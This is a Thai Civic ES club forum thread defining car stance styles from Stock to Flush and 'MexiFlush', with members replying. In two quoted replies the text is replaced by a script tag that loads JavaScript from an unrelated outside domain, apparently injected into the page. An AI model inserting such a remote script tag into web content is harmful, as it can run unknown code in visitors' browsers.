ตอบ
arnut

ชื่อเล่น: โดนัท

เข้าร่วม: 12 เมษา 2010
ตอบ: 1385

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3786
ให้คำขอบคุณ: 624

ที่อยู่: บ้านอยู่ ดอนเมือง กรุงเทพ หอพัก ชลบรี ศรีราชา ม.เกษตร
ปี: 2004
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 2 กันยา 2012 03:58 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
เผื่อพี่ๆๆที่สนใจจะลองจับเจ้าESของเราทำแนวFlushบ้าง. ถ้าชอบจะไปแนวนี้จะได้ไม่เสียเงินซ้ำซ้อน ถ้าไม่ชอบก็เก็บไว้เป็นความรู้พอครับ:))
ข้อมูลที่ได้มาต้องขอบคุณทางเว็บด้วยนะครับ
http://www.flushstyle.com/thread-736-1-1.html

-Stock                   คือความสูงเดิม ๆ กับ Offset ล้อของรถเดิม ๆ STD
-Dropped           คือ การโหลดลงมาโดยใช้ สปริงโหลด สังเกตุจากในรูปคือจะไม่เตี้ยมาก
-Dropped           คือ การโหลดลงมาโดยใช้ ช่วงล่าง สตรัทปรับเกลียว สังเกตุจากในรูปจะเตี้ยลงมาอีก
-Slammed            คือ การโหลดลงมาให้เตี้ย มาก โดยใช้ ช่วงล่าง สตรัทปรับเกลียว
-Flush              คือ การโหลดเตี้ยให้ยางเบียดกับซุ้มล้อ Stance n' Fitment โดยการใช้ล้อหน้ากว้าง+ยางที่หน้าแคบ
-Hella Flush      คือ  การโหลดเตี้ยให้ยางเบียดกับซุ้มล้อ Stance n' Fitment โดยการใช้ล้อหน้ากว้างมาก+ยางหน้าแคบ+เทคนิกการแบะล้อช่วยในกรณีที่ ขอบล้อยื่นออกมานอกรถ
-Hella Fail            คือ การโหลดเตี้ยให้ยางเบียดกับซุ้มล้อ โดยการใช้ล้อหน้ากว้างมาก+ยางหน้าแคบ+การแบะล้อมากเกินไป ในกรณีที่ ขอบล้อยื่นออกมานอกรถ *อันนี้ไม่ควรทำ
-MexiFlush           คือการใส่ล้อผิด Offset ทำให้ล้อยื่นออกมานอกตัวรถมากเกินไป+ยางหนาหน้ากว้าง  การใส่ล้อ+ยางแบบนี้ไม่สามารถ จัดวางล้อ Stance n' Fitment ได้ = ชื่อเรียกนี้ทางเมืองนอกตั้งขึ้นมาเพื่อ จิก กัด ด่า ล้อเลียน เหน็บแนม หลายคนเข้าใจผิดคิดว่าเท่ เป็นแนว Hella Flush  มันไม่ใช่แนวทางการแต่ง ไม่ใช่สไตล์  แต่งแบบนี้ทางเมืองนอกเค้าด่ายับ   *อันนี้ไม่ควรทำเป็นอย่างยิ่ง แต่ถ้าจะบอกว่าชอบใส่ล้อยื่นแบบนี้ จะเรียกแนว ว่าเป็นแนว Drag แนว ThaiRetro หรืออะไรก็ตาม ไม่ว่ากันคับ แต่ถ้าจะบอกว่าล้อยื่น ๆ แบบนี้เป็นแนว Flush ข้อย้ำว่ามันไม่ใช่คับ

Attached File :
<<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
<<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ

แก้ไขล่าสุดโดย เมื่อ จันทร์, 3 กันยา 2012 14:13, ทั้งหมด 3 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: bankabby  siripong  pong5674  si_ton  MALLMAR  focusyo  jarin  baberonte  DELL  BeL  tonaff  tokykung  Doraeman  pued007  formula  Vee  KAATO 
bbb@es

เข้าร่วม: 14 ธันวา 2008
ตอบ: 993

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1161
ให้คำขอบคุณ: 48

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 2 กันยา 2012 05:06 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
สำหรับผมรถเรา-เงินเราคับแต่งรถไม่ต้องมีกฎมากขนาดนี้ก็ได้เราชอบของเราใครว่าเราเสี่ยวก็ไม่ว่ากันอย่าให้ได้ยินเปนพอคับอีกอย่างไอ้แนวฟลัชเนี่ยมันก็มีมาตั้ง20ปีแล้วมั้งคับโหลดแป้กๆเนี่ยเพียงแต่มะก่อนมันหาล้อแบบนี้ไม่ได้แค่นั้นเองสำหรับผมๆว่ามันไม่ได้แปลกใหม่อะไรเลยนะคับเปนคหสตนะคับ
ได้รับคำขอบคุณจาก: MALLMAR  Edan  Cra2yLov3  arnut  Bonuses01  Vee 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ผู้ให้การสนับสนุน

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 2 กันยา 2012 07:14 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
อันสุดท้ายนี่มันนวกระบะช่ายปะครับนัท บ้านเราชอบทำอ่ะ
ได้รับคำขอบคุณจาก: MALLMAR  arnut 
pom_sawas

เข้าร่วม: 13 ธันวา 2008
ตอบ: 886

Guru ES
Guru ES

ได้รับคำขอบคุณ: 664
ให้คำขอบคุณ: 898

สี: เทา ซิลเวอร์สโตน (NH-630M)
อาทิตย์, 2 กันยา 2012 09:12 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
eskung พิมพ์ว่า:
อันสุดท้ายนี่มันนวกระบะช่ายปะครับนัท บ้านเราชอบทำอ่ะ

+1 แล้วเสริมแหนบด้วยครับ อิอิ
ได้รับคำขอบคุณจาก: ค้าอะไหล่โคตรเก่า  MALLMAR  arnut 
ค้าอะไหล่โคตรเก่า

เข้าร่วม: 06 ธันวา 2011
ตอบ: 5338

ได้รับคำขอบคุณ: 10891
ให้คำขอบคุณ: 12020

ที่อยู่: USED JAPAN SHOP sales & service เฉลิมพระเกียรติ ร.9 30
อาทิตย์, 2 กันยา 2012 19:03 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
pom_sawas พิมพ์ว่า:

"<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: MALLMAR  arnut 
bankabby

ชื่อเล่น: แบงค์

เข้าร่วม: 10 มิถุนา 2012
ตอบ: 1504

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1642
ให้คำขอบคุณ: 2485

อาทิตย์, 2 กันยา 2012 19:57 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
เก็บไว้เป็นความรู้ครับ

แต่ไม่เคยคิดจะทำเลย

เพราะถามใครต่อใคร ที่แต่งรถ พูดเป็นเสียงเดียวกันว่า อยากกลับมาทำเดิมๆ
si_ton

ชื่อเล่น: ต้น

เข้าร่วม: 04 พฤศจิกา 2011
ตอบ: 294

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 272
ให้คำขอบคุณ: 203

อาทิตย์, 2 กันยา 2012 20:56 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
pom_sawas พิมพ์ว่า:

"<script src="https://sport32news.com/civicesgroup.js">

+1 เจอเยอะมากไม่รู้พี่แกจะแรงไปไหนแต่ละคัน
TIRL_ES

ชื่อเล่น: เติ้ล

เข้าร่วม: 26 ธันวา 2011
ตอบ: 539

แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 280
ให้คำขอบคุณ: 176

สี: น้ำเงิน อิเทอนอล (B-96P)
อาทิตย์, 2 กันยา 2012 20:57 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
. .
MALLMAR

เข้าร่วม: 19 พฤศจิกา 2010
ตอบ: 765

Guru ES
Guru ES

ได้รับคำขอบคุณ: 520
ให้คำขอบคุณ: 6319

ปี: 2002
สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
จันทร์, 3 กันยา 2012 09:01 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
...
ได้รับคำขอบคุณจาก: arnut 
focusyo

ชื่อเล่น: โย

เข้าร่วม: 13 สิงหา 2011
ตอบ: 2849

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 8318
ให้คำขอบคุณ: 2490

ปี: 2005
จันทร์, 3 กันยา 2012 09:06 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
เยี่ยมครับ แบบนี้กระบะ ก็เรียก Flush ไม่ได้ครับ ล้อผิดแบบ
eschocolate

ชื่อเล่น: เต่า

เข้าร่วม: 19 ตุลา 2011
ตอบ: 1752

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1339
ให้คำขอบคุณ: 1238

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
จันทร์, 3 กันยา 2012 11:07 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
focusyo พิมพ์ว่า:
เยี่ยมครับ แบบนี้กระบะ ก็เรียก Flush ไม่ได้ครับ ล้อผิดแบบ

+1 ตามพี่โยเลยครับ กระบะมาหน้าเต็ม
Cra2yLov3

ชื่อเล่น: จุ่น

เข้าร่วม: 01 กุมภา 2012
ตอบ: 490

ได้รับคำขอบคุณ: 580
ให้คำขอบคุณ: 358

สี: ดำ ไนท์ฮอว์ก (B-92P)
จันทร์, 3 กันยา 2012 13:14 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
bbb@es พิมพ์ว่า:
สำหรับผมรถเรา-เงินเราคับแต่งรถไม่ต้องมีกฎมากขนาดนี้ก็ได้เราชอบของเราใครว่าเราเสี่ยวก็ไม่ว่ากันอย่าให้ได้ยินเปนพอคับอีกอย่างไอ้แนวฟลัชเนี่ยมันก็มีมาตั้ง20ปีแล้วมั้งคับโหลดแป้กๆเนี่ยเพียงแต่มะก่อนมันหาล้อแบบนี้ไม่ได้แค่นั้นเองสำหรับผมๆว่ามันไม่ได้แปลกใหม่อะไรเลยนะคับเปนคหสตนะคับ

เห็นด้วยครับ +1
tonaff

ชื่อเล่น: เอ

เข้าร่วม: 26 ธันวา 2008
ตอบ: 673

Guru ES
Guru ES

ได้รับคำขอบคุณ: 721
ให้คำขอบคุณ: 1404

ปี: 2005
อังคาร, 4 กันยา 2012 10:08 - <<การแต่งรถแนวFlush>ถ้าซ้ำขออภัยนะครับ
ล้อยื่นๆแนวตรงๆไอ้เราก็นึกว่าฟลัช
เห็นใส่กันเยอะ เค้าเรียกmexiนี่กว่า
จะได้เรียกกะเค้าถูกๆ
แต้งกิ้วสำหรับความรู้แบบกระจ่างคับโดนัท
luckratchada

ชื่อเล่น: ลักษณ์

เข้าร่วม: 29 ธันวา 2011
ตอบ: 629

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938
ให้คำขอบคุณ: 304

ศุกร์, 22 กุมภา 2013 09:35 - แนวทางในการ flush
-Stock คือความสูงเดิม ๆ กับ Offset ล้อของรถเดิม ๆ STD

-Dropped (เปลี่ยนสปริง) คือ การโหลดลงมาโดยใช้ สปริงโหลด สังเกตุจากในรูปคือจะไม่เตี้ยมาก
... -Dropped คือ การโหลดลงมาโดยใช้ ช่วงล่าง สตรัทปรับเกลียว สังเกตุจากในรูปจะเตี้ยลงมาอีก
-Slammed คือ การโหลดลงมาให้เตี้ย มาก โดยใช้ ช่วงล่าง สตรัทปรับเกลียว

* -Flush คือ การโหลดเตี้ยให้ยางเบียดกับซุ้มล้อ Stance n' Fitment โดยการใช้ล้อหน้ากว้าง+ยางที่หน้าแคบ
** -Hella Flush คือ การโหลดเตี้ยให้ยางเบียดกับซุ้มล้อ Stance n' Fitment โดยการใช้ล้อหน้ากว้างมาก+ยางหน้าแคบ+เทคนิกการแบะล้อช่วยในกรณีที่ ขอบล้อยื่นออกมานอกรถ

-Hella Fail คือ การโหลดเตี้ยให้ยางเบียดกับซุ้มล้อ โดยการใช้ล้อหน้ากว้างมาก+ยางหน้าแคบ+การแบะล้อมากเกินไป ในกรณีที่ ขอบล้อยื่นออกมานอกรถ *อันนี้ไม่แนะนำเพราะจะกินดอกยางมาก
-MexiFlush คือการใส่ล้อผิด Offset ทำให้ล้อยื่นออกมานอกตัวรถมากเกินไป + ยางหนาหน้ากว้าง การใส่ล้อและยางแบบนี้ไม่สามารถจัดวางล้อได้เหมาะสม และไม่ได้เรียกว่าแนวฟลัช ครับ

ตัวอย่างในการflush
ตัวอย่างในการflush
ได้รับคำขอบคุณจาก: converse 
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.